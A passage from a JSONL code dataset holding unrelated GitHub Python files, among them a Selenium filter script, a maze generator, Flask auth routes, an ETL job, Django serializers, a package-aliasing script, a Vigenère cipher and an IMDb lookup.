\"tabel\"))\n\t)\n\n\texcel = element.find_element_by_xpath(\"//a[@href='/manager/projects/export']\")\n\t#excel.click()\n#########################################################################Filter\n\telement = kodok.find_element_by_id(\"filter\")\n\textend = element.find_element_by_xpath(\"//button[@class='btn btn-tool']\")\t\t#find the \"+\" button to extend\n\n\textend.click()\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#extend\n\n\tfilters = WebDriverWait(kodok, 10).until(\n\t\tEC.presence_of_element_located((By.XPATH, \"//div[@class='card-body']\"))\t\t#take the filter body to access the dropdown\n\t)\n#========================================================================PIC\n\tdropdown = filters.find_element_by_id(\"filter-pic\")\t\t\t\t\t\t\t\t#ambil filter pic\n\tselect = Select(dropdown)\n\n\tselect.select_by_visible_text(\"YBP\")\n#========================================================================Product\n\tdropdown = filters.find_element_by_id(\"filter-product\")\t\t\t\t\t\t\t#ambil filter product\n\tselect = Select(dropdown)\n\n\tselect.select_by_visible_text(\"BersamaKU\")\n#========================================================================Mitra\n\tdropdown = filters.find_element_by_id(\"filter-mitra\")\t\t\t\t\t\t\t#ambil filter mitra\n\tselect = Select(dropdown)\n\n\tselect.select_by_visible_text(\"Western Union\")\n#========================================================================Project\n\tdropdown = filters.find_element_by_id(\"filter-namap\")\t\t\t\t\t\t\t#ambil filter nama project\n\n\tdropdown.send_keys(\"Remittance\")\n\tdropdown.clear()\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#kalo mau ngosongin filter bentuk textbox\n#========================================================================Jenis Project\n\tdropdown = filters.find_element_by_id(\"filter-ptype\")\t\t\t\t\t\t\t#ambil filter jenis project\n\tselect = Select(dropdown)\n\n\tselect.select_by_visible_text(\"Sertifikasi\")\n#========================================================================Status\n\tdropdown = filters.find_element_by_id(\"filter-pstat\")\t\t\t\t\t\t\t#ambil filter status project\n\tselect = Select(dropdown)\n\n\tselect.select_by_visible_text(\"Pengujian Done\")\n\ttime.sleep(2)\n\tselect.select_by_visible_text(\"Drop\")\n\t#select.select_by_visible_text(\"-\")\t\t\t\t\t\t\t\t\t\t\t\t#kalo mau ngosongin filter bentuk select\n#########################################################################Logout\n\ttime.sleep(3)\n\telement = kodok.find_element_by_id(\"rn-dropdown\")\n\telement.click()\n\n\tlogout = element.find_element_by_xpath(\"//a[@class='dropdown-item' and @href='/logout']\")\n\tlogout.click()\n\nfinally:\n\ttime.sleep(3)\n\tkodok.quit()","repo_name":"aufarr16/KodokSelenium","sub_path":"Python/By Page/Manager/ListProject.py","file_name":"ListProject.py","file_ext":"py","file_size_in_byte":3883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"975371702","text":"# prims algorithm\n\nimport random\nclass Maze:\n '''\n * 1 repsesents wall, 0 represents path\n '''\n def __init__(self, width, height) -> None:\n self.width = width\n self.height = height\n # self.maze = self.generate_maze(width, height)\n \n def prims_algorithm(self):\n # prims algorithm to generate maze\n width = self.width\n height = self.height\n \n # Initialize maze with walls\n maze = [['1' for _ in range(width)] for _ in range(height)]\n \n # Choose a random starting cell\n start_x = random.randint(0, width - 1)\n start_y = random.randint(0, height - 1)\n maze[start_y][start_x] = '0'\n \n # List of walls to consider\n walls = [(start_x + 1, start_y), (start_x - 1, start_y),\n (start_x, start_y + 1), (start_x, start_y - 1)]\n \n while walls:\n random_wall = random.choice(walls)\n x, y = random_wall\n \n # Count the number of neighbors with paths\n neighbors = 0\n if x > 0 and maze[y][x - 1] == '0':\n neighbors += 1\n if x < width - 1 and maze[y][x + 1] == '0':\n neighbors += 1\n if y > 0 and maze[y - 1][x] == '0':\n neighbors += 1\n if y < height - 1 and maze[y + 1][x] == '0':\n neighbors += 1\n \n if neighbors == 1:\n maze[y][x] = '0'\n \n # Add neighboring walls to the list\n if x > 0:\n walls.append((x - 1, y))\n if x < width - 1:\n walls.append((x + 1, y))\n if y > 0:\n walls.append((x, y - 1))\n if y < height - 1:\n walls.append((x, y + 1))\n \n walls.remove(random_wall)\n \n return maze\n\nif __name__ == '__main__':\n # Example usage\n def print_maze(maze):\n for row in maze:\n print(' '.join(row))\n\n \n maze_width = 21\n maze_height = 21\n maze = Maze(maze_width, maze_height).prims_algorithm()\n print_maze(maze)\n","repo_name":"AGI-RESEARCH-SEC/snake-game-env","sub_path":"maze.py","file_name":"maze.py","file_ext":"py","file_size_in_byte":2188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17658458580","text":"from flask import Blueprint, request\n\nfrom services.auth import AuthService\nfrom utills.response_code import RESPONSE_CODE\nfrom utills.decorators import login_required, header_required, response_formatted\n\nauth_blueprint = Blueprint(name='auth', import_name=__name__)\n\n\n@auth_blueprint.route(rule='/validate', methods=['POST'], endpoint='validate_token')\n@header_required\n@login_required\n@response_formatted\ndef validate_token():\n email = request.headers.get('x-user-email')\n access_token = request.headers.get('x-access-token')\n auth_service = AuthService(access_token=access_token, email=email)\n\n item, code = auth_service.validate_access_token()\n if not item:\n return RESPONSE_CODE[code], None, 400\n\n return RESPONSE_CODE[code], item, 200\n\n\n@auth_blueprint.route(rule='/refresh', methods=['POST'], endpoint='refresh_token')\n@header_required\n@login_required\n@response_formatted\ndef refresh_token():\n email = request.headers.get('x-user-email')\n access_token = request.headers.get('access_token')\n auth_service = AuthService(access_token=access_token, email=email)\n\n item, code = auth_service.refresh_access_token()\n if not item:\n return RESPONSE_CODE[code], None, 400\n\n return RESPONSE_CODE[code], item, 200\n","repo_name":"JeongHM/BKL","sub_path":"controllers/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32030211291","text":"class Queue:\n def __init__(self):\n self.__queue = []\n self.__front=0\n self.__count=0\n \n def enqueue(self,item):\n self.__queue.append(item)\n self.__count+=1\n \n def dequeue(self):\n if self.__count==0:\n return \"Empty queue\"\n elem=self.__queue[self.__front]\n self.__front+=1\n self.__count-=1\n return elem\n def getFront(self):\n if self.__count == 0:\n return \"Empty queue\"\n return self.__queue[self.__front]\n def size(self):\n return self.__count\n def isEmpty(self):\n return self.size() == 0\n \n \nq=Queue()\nq.enqueue(1)\nq.enqueue(2)\nq.enqueue(3)\nq.dequeue()\nprint(q.getFront())\nprint(q.size())\nprint(q.isEmpty())\n\n","repo_name":"AtharvaAshar/DSA-Python","sub_path":"Queues/queueUsingArray.py","file_name":"queueUsingArray.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12370900427","text":"import mjdb\nimport sgws\nimport config\nimport common as cmn\nimport pandas as pd\nimport datetime as dt\nimport sgHelpers as hlp\nfrom sqlalchemy import create_engine\n\nENGINE = create_engine(config.config('config.ini','postgres_alchemy')['url'])\nLOGDIR = 'etl_sagitta'\nFILE = 'payees'\n\nlf = cmn.log_filer(LOGDIR,FILE)\n\ndef payees_row(sagitem,soup):\n row = {\n 'sagitem':sagitem,\n 'audit_entry_dt':int(soup.find('AuditEntryDt').text) if soup.find('AuditEntryDt') else None,\n 'audit_time':int(soup.find('AuditTime').text) if soup.find('AuditTime') else None,\n 'mga':soup.find('MGA').text if soup.find('MGA') else None\n }\n for t in ('audit_staff_cd','audit_cd','audit_history_record_number','audit_program','audit_effective_dt','payee_name','initial_dt','contact_name','addr_1','addr_2','postal_code','postal_extension_code','city','state_prov_cd','phone_1_number','phone_2_number','agency_cd','pay_method_cd','num_days','fax_number','phone_1_extention_number','phone_2_extention_number','off_dt','direct_bill_ind','release_ind','email_addr','description','global','payee_responsible_for_filing','tax_fee_payee'):\n tag = ''.join([x.capitalize() for x in t.split('_')])\n row[t] = soup.find(tag).text if soup.find(tag) else None \n return row \n\ndef cov_ins_percent_info_row(sagitem,lis,soup):\n row = {\n 'sagitem':sagitem,\n 'lis':lis,\n 'db_new_pct':soup.find('DBNewPct').text if soup.find('DBNewPct') else None,\n 'db_ren_pct':soup.find('DBRenPct').text if soup.find('DBRenPct') else None\n }\n for t in ('coverage_cd','agency_new_pct','agency_ren_pct','begin_dt','end_dt','standard_comm_ind','insurer_cd','grading_from_amt','grading_to_amt','commission_type_ind','comm_div','comm_dept'):\n tag = ''.join([x.capitalize() for x in t.split('_')])\n row[t] = soup.find(tag).text if soup.find(tag) else None \n return row \n\ndef div_dept_designations_row(sagitem,lis,soup):\n row = {\n 'sagitem':sagitem,\n 'lis':lis\n }\n for t in ('valid_div','valid_dept','limit_new','limit_new_date','limit_renew','limit_renew_date'):\n tag = ''.join([x.capitalize() for x in t.split('_')])\n row[t] = soup.find(tag).text if soup.find(tag) else None \n return row \n\ndef main():\n payees = []\n covInsPercentInfo = []\n divDeptDesignations = []\n\n try:\n lastEntry = mjdb.sg_last_entry(FILE)\n except Exception as e:\n lf.error(f\"mjdb.sg_last_entry({FILE})\\n{e}\")\n else:\n lastEntryDate = (dt.date(1967,12,31) + dt.timedelta(days=lastEntry[0])) if lastEntry[0] else dt.date(1967,12,31)\n lastEntryTime = ((dt.datetime.min + dt.timedelta(seconds=lastEntry[1])).time()) if lastEntry[1] else dt.time(0,0,0)\n try:\n batchesStatement = f\"SELECT {FILE.replace('_','.').upper()} *CRITERIA.BATCH* WITH LAST.ENTRY.DATE GE {dt.datetime.strftime(lastEntryDate, '%m-%d-%Y')}\"\n batchesResponse = sgws.post_ptr_access_statement(batchesStatement)\n except Exception as e:\n lf.error(f\"sgws.post_ptr_access_statement({batchesStatement})\\n{e}\")\n else:\n for batch in hlp.parse_batch_items(batchesResponse):\n try:\n batchStatement = f\"SELECT {FILE.replace('_','.').upper()} *GET.BATCH* {batch}\"\n batchResponse = sgws.post_ptr_access_statement(batchStatement)\n except Exception as e:\n lf.error(f\"sgws.post_ptr_access_statement({batchStatement})\\n{e}\")\n for item in batchResponse.find_all('Item'):\n try:\n sagitem = item.get('sagitem')\n payees.append(payees_row(sagitem,item))\n except Exception as e:\n lf.error(f\"payees_row({sagitem},<>)\\n{e}\")\n else:\n try:\n [covInsPercentInfo.append(cov_ins_percent_info_row(sagitem,int(x.get('lis')),x)) for x in item.find_all('CovInsPercentInfo')]\n except Exception as e:\n lf.error(f\"unable to parse CovInsPercentInfo for {sagitem}:\\n{e}\")\n try:\n [divDeptDesignations.append(div_dept_designations_row(sagitem,int(x.get('lis')),x)) for x in item.find_all('DivDeptDesignations')]\n except Exception as e:\n lf.error(f\"unable to parse DivDeptDesignations for {sagitem}:\\n{e}\")\n stages = {\n 'payees':payees if payees else None,\n 'payees_cov_ins_percent_info':covInsPercentInfo if covInsPercentInfo else None,\n 'payees_div_dept_designations':divDeptDesignations if divDeptDesignations else None\n }\n for s in stages:\n if stages[s]:\n try:\n rcs = pd.DataFrame(stages[s]).to_sql(f'stg_{s}',ENGINE,'sagitta','replace',index=False,chunksize=10000,method='multi')\n except Exception as e:\n lf.error(f\"unable to stage records for {s}\\n{e}\")\n else:\n lf.info(f\"{rcs} record(s) staged for {s}\")\n if rcs > 0:\n try:\n rcu = mjdb.upsert_stage('sagitta',s, 'upsert')\n except Exception as e:\n lf.error(f\"mjdb.upsert_stage('sagitta',{s})\\n{e}\")\n else:\n lf.info(f\"mjdb.upsert_stage('sagitta',{s}) affected {rcu} record(s)\")\n finally:\n mjdb.drop_table('sagitta', f'stg_{s}')\n else:\n lf.info(f\"no records to stage for {s}\") \n\nif __name__ == '__main__':\n main()","repo_name":"jbeckom/python-mjdw","sub_path":"etl_sagitta_payees.py","file_name":"etl_sagitta_payees.py","file_ext":"py","file_size_in_byte":5931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13405283442","text":"from rest_framework import serializers\nfrom .models import Consumer, Transaction, User, Gru\n\nclass UserSerializer(serializers.ModelSerializer):\n class Meta:\n model = User\n fields = ['username', 'first_name', 'last_name', 'is_consumer']\n\nclass ConsumerSerializer(serializers.ModelSerializer):\n user = UserSerializer(read_only = True)\n class Meta:\n model = Consumer\n fields = ['credit', 'has_studentship', 'created_at', 'type', 'user', 'user_hash']\n\n def create(self, validated_data):\n user = User(\n username=validated_data['username'],\n first_name=validated_data['first_name'],\n last_name=validated_data['last_name'],\n is_consumer=validated_data['is_consumer']\n )\n user.set_password(validated_data['password'])\n user.save()\n consumer = Consumer(\n user=user,\n credit=validated_data['credit'],\n has_studentship=validated_data['has_studentship'],\n type=validated_data['type']\n )\n consumer.save()\n\n return consumer\n\nclass TransactionSerializer(serializers.ModelSerializer):\n class Meta:\n model = Transaction\n fields = ['type', 'value', 'created_at', 'consumer_cpf', 'operator']\n\n def create(self, validated_data):\n transaction = Transaction(\n type = validated_data['type'],\n value = validated_data['value'],\n consumer_cpf = validated_data['consumer_cpf'],\n operator = validated_data['operator'],\n )\n transaction.save()\n return transaction\n\nclass GruSerializer(serializers.ModelSerializer):\n class Meta:\n model = Gru\n fields = ['code', 'value', 'created_at', 'consumer_cpf', 'operator']\n\n def create(self, validated_data):\n gru = Gru(\n code=validated_data['code'],\n value=validated_data['value'],\n consumer_cpf=validated_data['consumer_cpf'],\n operator=validated_data['operator']\n )\n\n gru.save()\n\n return gru\n","repo_name":"igorcaavalcante/easyru","sub_path":"core/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"31532994196","text":"#!/usr/bin/env python3\n\nimport os\nimport re\nimport sys\nfrom argparse import ArgumentParser\nfrom copy import deepcopy\nfrom pathlib import Path\nfrom shutil import copyfile, copytree, rmtree\nfrom subprocess import check_call\n\nimport toml\n\nif __name__ == \"__main__\":\n # parse arguments ######################################################################\n parser = ArgumentParser()\n parser.add_argument(\"new_name\", help=\"The aliased name for this package when installing it.\")\n parser.add_argument(\n \"--install\", help=\"Install the package if this flag is present.\", action=\"store_true\"\n )\n parser.add_argument(\n \"--test\", help=\"Test the (new named) package if this flag is present.\", action=\"store_true\"\n )\n args = parser.parse_args()\n new_name = args.new_name\n\n # validate the new name ###############################################################\n assert re.match(\"[-a-zA-Z0-9_]+\", new_name) is not None, \"Invalid package name\"\n\n # create the new package description ##################################################\n root_path = Path(__file__).parent.absolute()\n current_config = toml.loads((root_path / \"pyproject.toml\").read_text())\n new_package_path = Path(__file__).parent.absolute() / new_name\n print(f\"new_package_path: {new_package_path}\")\n\n old_name = current_config[\"project\"][\"name\"]\n\n # remove the old generated package ####################################################\n if new_package_path.exists():\n rmtree(new_package_path)\n\n # copy files ##########################################################################\n for path in [\"torch2jax\", \"pyproject.toml\", \"setup.py\", \"tests\", \"README.md\", \"images\"]:\n src = root_path / path\n dest = new_package_path / path\n if src.is_file():\n copyfile(src, dest)\n else:\n copytree(src, dest)\n\n # rename the source directory #########################################################\n os.rename(new_package_path / \"torch2jax\", new_package_path / new_name)\n\n # write new config ####################################################################\n new_config = deepcopy(current_config)\n new_config[\"project\"][\"name\"] = new_name\n Path(new_package_path / \"pyproject.toml\").write_text(toml.dumps(new_config))\n\n # rewrite the setup.py file\n setup_py = Path(root_path / \"setup.py\").read_text()\n new_setup_py = re.sub(f'name=\"{old_name}\"', f'name=\"{new_name}\"', setup_py)\n Path(new_package_path / \"setup.py\").write_text(new_setup_py)\n\n # rewrite the README.md file\n README_md = Path(root_path / \"README.md\").read_text()\n README_md = re.sub(\n f\"from {old_name}\",\n f\"from {new_name}\",\n Path(new_package_path / \"README.md\").read_text(),\n )\n README_md = (\n f\"### **NOTE: `{new_name}` is a pip alias for `{old_name}`**\\n\\n\"\n + f\"

    \\n\\n---\\n\\n

    \\n\\n{README_md}\"\n )\n Path(new_package_path / \"README.md\").write_text(README_md)\n\n # rewrite the pyproject.toml file\n pyproject_toml = Path(root_path / \"pyproject.toml\").read_text()\n new_pyproject_toml = re.sub(\n f\"name\\s*=\\s*\\\"{current_config['project']['name']}\\\"\",\n f'name = \"{new_name}\"',\n pyproject_toml,\n )\n new_pyproject_toml = re.sub(\n f\"{current_config['project']['name']}\\s*=\", f\"{new_name} = \", new_pyproject_toml\n )\n Path(new_package_path / \"pyproject.toml\").write_text(new_pyproject_toml)\n\n # rename the test files ###############################################################\n test_files = sum(\n [\n [Path(root).absolute() / f for f in fnames if Path(f).suffix == \".py\"]\n for (root, _, fnames) in os.walk(new_package_path / \"tests\")\n ],\n [],\n )\n for test_file in test_files:\n test_file_text = Path(test_file).read_text()\n test_file_text = re.sub(\n f\"from {current_config['project']['name']}\",\n f\"from {new_name}\",\n test_file_text,\n )\n Path(test_file).write_text(test_file_text)\n\n if args.install:\n # install the package ##################################################################\n check_call([sys.executable, \"-m\", \"pip\", \"install\", \"-e\", str(new_package_path)])\n\n if args.test:\n assert args.install, \"You must install package before testing it, sorry.\"\n check_call([sys.executable, \"-m\", \"pytest\", str(new_package_path / \"tests\")])\n","repo_name":"rdyro/torch2jax","sub_path":"make_aliased_package.py","file_name":"make_aliased_package.py","file_ext":"py","file_size_in_byte":4472,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"72"} +{"seq_id":"71502003753","text":"from random import randint\nprint('Qual valor entre 0 e 10 o programa pensou? ')\nr = randint(0,10)\nq = 0\nacerto = False\nwhile not acerto:\n v = int(input('Qual é o seu palpite? '))\n q += 1\n if v > r :\n print('Menos... Tente novamente')\n if v < r:\n print('Mais... Tente novamente')\n if v == r:\n acerto = True\nprint(f'\\033[34mParabéns\\033[m, você acertou depois de \\033[34m{q}\\033[m tentativas')\n","repo_name":"qnomon/Python-Studies","sub_path":"ex058.py","file_name":"ex058.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32730461328","text":"from __future__ import division, print_function\n\nfrom itertools import cycle\nimport os\nimport sys\n\nfrom accelerator.colourwrapper import colour\nfrom accelerator.compat import PY2\nfrom accelerator import mp\n\n\ndef split_colour(spec):\n\tseq = colour('/', spec)\n\tif seq == '/':\n\t\treturn '', ''\n\tseq = seq.split('/', 1)[0] # we only want the setting, not the unsetting\n\tassert seq.startswith('\\x1b[')\n\tassert seq.endswith('m')\n\tseq = seq[2:-1]\n\tassert '\\x1b' not in seq\n\tfg = []\n\tbg = []\n\tfor part in seq.split(';'):\n\t\tcode = int(part.split(':', 1)[0])\n\t\tif 30 <= code <= 38 or 90 <= code <= 97:\n\t\t\ttarget = fg\n\t\telif 40 <= code <= 48 or 100 <= code <= 107:\n\t\t\ttarget = bg\n\t\telif code not in (39, 49):\n\t\t\tprint(\"Sorry, %s can only use colours, not attributes\" % (spec,), file=sys.stderr)\n\t\t\tsys.exit(1)\n\t\ttarget.append(part)\n\treturn ';'.join(fg), ';'.join(bg)\n\n\n# a rather incomplete SGR parser that replaces colour resets by our\n# selected colour (if we have one).\ndef collect_escseq(it, line_fg, line_bg):\n\tchars = ['\\x1b']\n\ttry:\n\t\tc = next(it)\n\t\tchars.append(c)\n\t\tif c == '[':\n\t\t\twhile True:\n\t\t\t\tc = next(it)\n\t\t\t\tif c == 'm':\n\t\t\t\t\tpieces = []\n\t\t\t\t\tfor piece in ''.join(chars)[2:].split(';'):\n\t\t\t\t\t\tcode = int(piece.split(':', 1)[0] or '0', 10)\n\t\t\t\t\t\tif code == 0:\n\t\t\t\t\t\t\tpieces = ['']\n\t\t\t\t\t\t\tif line_fg:\n\t\t\t\t\t\t\t\tpieces.append(line_fg)\n\t\t\t\t\t\t\tif line_bg:\n\t\t\t\t\t\t\t\tpieces.append(line_bg)\n\t\t\t\t\t\telif code == 39 and line_fg:\n\t\t\t\t\t\t\tpieces.append(line_fg)\n\t\t\t\t\t\telif code == 49 and line_bg:\n\t\t\t\t\t\t\tpieces.append(line_bg)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tpieces.append(piece)\n\t\t\t\t\treturn ('\\x1b[', ';'.join(pieces), 'm',)\n\t\t\t\tchars.append(c)\n\t\t\t\tif c not in '0123456789;:':\n\t\t\t\t\tbreak\n\texcept (StopIteration, ValueError):\n\t\tpass\n\treturn chars\n\n\ndef enable_lines(colour_prefix, process_setup=lambda: None, decode_lines=False):\n\tpre_fg0, pre_bg0 = split_colour(colour_prefix + '/oddlines')\n\tpre_fg1, pre_bg1 = split_colour(colour_prefix + '/evenlines')\n\tif pre_fg0 == pre_bg0 == pre_fg1 == pre_bg1 == '':\n\t\treturn\n\n\tdef lineme():\n\t\tos.close(liner_w)\n\t\tprocess_setup()\n\n\t\tcolours = cycle([\n\t\t\t(pre_fg0, pre_bg0),\n\t\t\t(pre_fg1, pre_bg1),\n\t\t])\n\n\t\tif PY2:\n\t\t\tin_fh = sys.stdin\n\t\t\terrors = 'replace'\n\t\telse:\n\t\t\tin_fh = sys.stdin.buffer.raw\n\t\t\terrors = 'surrogateescape'\n\t\tfor line in in_fh:\n\t\t\tline_fg, line_bg = next(colours)\n\t\t\tline = line.rstrip(b'\\n').decode('utf-8', errors)\n\t\t\tif decode_lines:\n\t\t\t\tline = '\\\\'.join(part.replace('\\\\n', '\\x1b[K\\n' if line_bg else '\\n') for part in line.split('\\\\\\\\'))\n\t\t\ttodo = iter(line)\n\t\t\tdata = []\n\t\t\tif line_fg and line_bg:\n\t\t\t\tdata.append('\\x1b[%s;%sm' % (line_fg, line_bg,))\n\t\t\telif line_bg:\n\t\t\t\tdata.append('\\x1b[%sm' % (line_bg,))\n\t\t\telif line_fg:\n\t\t\t\tdata.append('\\x1b[%sm' % (line_fg,))\n\t\t\tfor c in todo:\n\t\t\t\tif c == '\\x1b':\n\t\t\t\t\tdata.extend(collect_escseq(todo, line_fg, line_bg))\n\t\t\t\telse:\n\t\t\t\t\tdata.append(c)\n\t\t\tif line_bg:\n\t\t\t\tdata.append('\\x1b[K') # try to fill the line with bg (if terminal does BCE)\n\t\t\tdata.append('\\x1b[m\\n')\n\t\t\tdata = ''.join(data).encode('utf-8', errors)\n\t\t\twhile data:\n\t\t\t\tdata = data[os.write(1, data):]\n\tliner_r, liner_w = os.pipe()\n\tliner_process = mp.SimplifiedProcess(\n\t\ttarget=lineme,\n\t\tstdin=liner_r,\n\t\tname=colour_prefix + '-liner',\n\t)\n\tos.close(liner_r)\n\tos.dup2(liner_w, 1) # this is stdout for the parent process now\n\tos.close(liner_w)\n\treturn liner_process\n","repo_name":"pabloyoyoista/accelerator","sub_path":"accelerator/shell/lined.py","file_name":"lined.py","file_ext":"py","file_size_in_byte":3314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"37581639518","text":"import pytest\nfrom rest_framework import status\n\nfrom tests.factories import AnnouncementFactory\n\n\n@pytest.mark.django_db\ndef test_favorite_create(client, user_with_jwt_access_token):\n user, jwt_access_token = user_with_jwt_access_token\n ads_list = AnnouncementFactory.create_batch(10)\n\n data = {\n \"name\": \"test\",\n \"ads\": [ads.pk for ads in ads_list]\n }\n\n expected_data = {\n \"id\": 1,\n \"author\": user.username,\n \"name\": \"test\",\n \"ads\": [ads.pk for ads in ads_list]\n }\n\n response = client.post(\n \"/selection/\",\n data=data,\n content_type=\"application/json\",\n HTTP_AUTHORIZATION=f\"Bearer {jwt_access_token}\"\n )\n\n assert response.status_code == status.HTTP_201_CREATED\n assert response.data != expected_data\n","repo_name":"SergeyL-1979/Skypro_PD_13.0_Sergey_Levchuk_HW_31","sub_path":"tests/favorites/favorite_create_test.py","file_name":"favorite_create_test.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2845777120","text":"#entradas\nnombre=str(input(\"Ingrese su nombre:\"))\nmonto=float(input(\"Ingrese el monto de su compra:\"))\n\n#caja negra\nif monto<500000:\n p=monto\n descuento=0\nelif monto>=500000 and monto<=100000:\n p=monto*0.05\n descuento=5\nelif monto>100000 and monto<=700000:\n p=monto*0.11\n descuento=11\nelif monto>700000 and monto<=1500000:\n p=monto*0.18\n descuento=18\nelif monto>1500000:\n p=monto*0.25\n descuento=25\n\n#salida\nprint(nombre,\",Su monto de la compra es de \",monto,\" El monto a pagar es de \",p,\" por el descuento del \",descuento,\"%\")\n","repo_name":"Julianespino17/Tallleres_Algoritmos_y_Programacion","sub_path":"Taller Estructuras de Control Selectivas/9_Ejercicio.py","file_name":"9_Ejercicio.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42512264350","text":"##!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#-------------------------------------------------------------------------\n# Archivo: main.py\n# Capitulo: Estilo Publica-Suscribe\n# Version: 3.0.0 Marzo 2022\n# Descripción:\n#\n# Este archivo define el punto de ejecución del Publicador\n#\n#-------------------------------------------------------------------------\nimport random, time\nfrom src.patient import Patient\nfrom src.helpers.publicador import publish\n\nif __name__ == '__main__':\n print(\"Iniciando simulación del sistema SMAM...\")\n older_patients = []\n total_patients = random.randint(1, 5)\n print(f\"actualmente hay {total_patients} adultos mayores...\")\n for _ in range(total_patients):\n older_patients.append(Patient())\n print(\"comenzando monitoreo...\")\n print()\n for _ in range(20):\n timer_time = random.choice([4, 8])\n medicine = random.choice(['Paracetamol', 'Dipirona magnésica', 'Dipirona hioscina', 'Tramadol', 'Antidepresivo', 'Aspirina', 'Antiarritmico', 'Diuretico'])\n\n for patient in older_patients:\n print(\"Extrayendo datos del adulto mayor...\")\n patient.check_devices()\n print(\"Analizando datos del adulto mayor...\")\n\n if (timer_time % patient.timer.time == 0) and patient.timer.medicine==medicine:\n patient.timer.medicine_time = 1\n\n print(\"Notificando eventos detectados...\")\n publish('monitor', patient.to_json())\n publish('notifier', patient.to_json())\n\n if patient.wearable.blood_pressure > 110 or patient.wearable.temperature > 37.5 or patient.wearable.heart_rate > 110:\n print(\"Actualizando expediente...\")\n publish('record', patient.to_json())\n print()\n\n time.sleep(1)\n","repo_name":"SilverParsnip96/smam-publish-subscriber","sub_path":"smam-app/publicadores/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1803,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13917615279","text":"import random\nimport os\nscript_dir = os.path.dirname(__file__) \n\nalphabet = \"abcdefghijklmnopqrstuvwxyz \"\nauxkey = \"abcdefghijklmnopqrstuvwxyz\"\n\nletter_to_index = dict(zip(alphabet, range(len(alphabet))))\nindex_to_letter = dict(zip(range(len(alphabet)), alphabet))\n\ndef generatekey(sizemsg):\n tamañokey = random.randrange(sizemsg)\n key = \"\"\n for i in range(tamañokey):\n while True:\n letra = random.choice(auxkey)\n if letra!=' ':\n key += letra\n i=i\n break\n return key\n\ndef encrypt(file,keyS):\n try:\n f=open(file,\"r\")\n message=f.read()\n f.close()\n key = str(keyS)\n returnMessage = \"Cypher made successfully plese check your directory\"\n \n if(keyS == \"777\"):\n key = generatekey(len(message))\n returnMessage +=\" the key generate is ' \"+ key +\" '\"\n encrypted = \"\"\n split_message = [\n message[i : i + len(key)] for i in range(0, len(message), len(key))\n ]\n\n for each_split in split_message:\n i = 0\n for letter in each_split:\n number = (letter_to_index[letter] + letter_to_index[key[i]]) % len(alphabet)\n encrypted += index_to_letter[number]\n i += 1\n\n f = open(\"encrypt.vig\",\"w\")\n f.write(encrypted)\n f.close\n return returnMessage\n except:\n return \"Error encrypt\"\n\n\ndef decrypt(file,keyS):\n try:\n f=open(file,\"r\")\n cipher=f.read()\n f.close()\n key=str(keyS)\n decrypted = \"\"\n split_encrypted = [\n cipher[i : i + len(key)] for i in range(0, len(cipher), len(key))\n ]\n\n for each_split in split_encrypted:\n i = 0\n for letter in each_split:\n number = (letter_to_index[letter] - letter_to_index[key[i]]) % len(alphabet)\n decrypted += index_to_letter[number]\n i += 1\n\n f = open(\"decrypt.vig\",\"w\")\n f.write(decrypted)\n f.close\n return \"Decipher made successfully, plese check your directory\"\n except:\n return \"Error Decryption\"\n","repo_name":"EdmundoSanchezM/Cryptography","sub_path":"Practica1Affine_Vigenere/example/Vigenere.py","file_name":"Vigenere.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36770010026","text":"from imdb import IMDb\n\nactors = list()\nmovies = list()\n\n\nia = IMDb()\nthe_matrix = ia.get_movie('0133093')\n\nfor person in the_matrix[\"cast\"]:\n actors.append(person)\n\n# Now find a person's movies\n#for actor in actors[0:2]:\n#print(actor['name'])\n#for movie in ia.get_person(actor.personID)['filmography'][0]['actor']:\n# movies.append(movie.movieID)\n\ndef get_movies_from_actor(actor):\n all_movies = list()\n\n person = ia.get_person(actor.personID)['filmography'][0]\n if 'actor' not in person:\n return\n\n for movie in person['actor']:\n all_movies.append(movie)\n\n return all_movies\n\nfor actor in actors:\n print(actor)\n new_movies = get_movies_from_actor(actor)\n if new_movies is not None:\n movies += new_movies\n\n\nprint(\"Number of movies:\", len(movies))\nprint(\"Number of actors:\", len(actors))","repo_name":"nobbyhawk/imdb_network","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36639348565","text":"from manimlib import *\n\nclass Formula(Scene):\n def construct(self):\n formula_tex1 = Tex(r\"\\begin{bmatrix} cos(2 \\pi / 3) & -sin(2 \\pi / 3) & 0 \\\\ sin(2 \\pi / 3) & cos(2 \\pi /3) & 0 \\\\ 0 & 0 & 1 \\end{bmatrix} \\begin{bmatrix} x \\\\ y \\\\ z 